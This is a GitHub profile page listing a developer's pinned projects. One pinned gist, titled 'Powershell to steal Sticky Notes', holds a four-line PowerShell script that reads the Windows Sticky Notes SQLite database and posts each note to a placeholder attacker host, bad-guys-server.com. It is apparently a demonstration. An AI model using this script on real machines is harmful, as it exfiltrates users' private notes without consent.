Skip to content
View jusso-dev's full-sized avatar
🔨
Grinding
🔨
Grinding
  • Australia
  • 08:36 - 11h ahead

Block or report jusso-dev

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. ISMSearch Public

    Provides the ability to search the ISM in the form of indexed documents, making it a lot faster and easier to find the answers you need.

    JavaScript 1

  2. TellMeMore Public

    Web app to collectively preform reconnaissance on web hosted solutions

    C#

  3. Flute Public

    Flute - a simple interface for creating, training and deploying machine learning models

    C#

  4. Powershell to steal Sticky Notes
    1
    $env:TEMP + "\PSSQLite\1.0.3\PSSQLite.psm1" | Import-Module 
    2
    $Database = $env:LOCALAPPDATA + "\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite"
    3
    $notes = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Note LIMIT 100"
    4
    foreach($note in $notes) { Invoke-RestMethod -Uri "https://bad-guys-server.com" -Method Post -Headers @{"Content-Type"="application/json"} -Body @{"NoteText"=$note.Text} | ConvertTo-Json }
  5. ApplicationInspector-action Public

    Github Action for Microsoft ApplicationInspector

    Dockerfile

  6. brainjsReactNativeExample Public

    React Native example of how to use offline trained models for brain js

    JavaScript